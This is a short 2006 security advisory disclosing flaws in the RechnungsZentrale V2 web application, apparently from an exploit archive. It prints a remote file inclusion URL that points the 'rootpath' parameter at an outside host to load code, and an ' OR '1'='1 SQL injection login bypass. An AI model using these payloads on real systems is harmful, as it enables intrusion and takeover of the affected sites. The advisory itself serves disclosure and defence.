RechnungsZentrale V2 <= 1.1.3 Remote Inclusion Vulnerability

2006-04-19 00:00:00

- GroundZero Security Research and Software Development 2006 -

Software: RechnungsZentrale V2
Version: 1.1.3, likely older versions are affected aswell.
Vendor: http://www.nfec.de/

Remote Inclusion:
http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4

SQL Injection:
User: ' OR '1'='1
Password: 1

- Bugs discovered by GroundZero Security Research and Software Development -
- http://www.GroundZero-Security.com | Http://www.g-0.org -

#

Fixes

No fixes

In order to submit a new fix you need to be registered.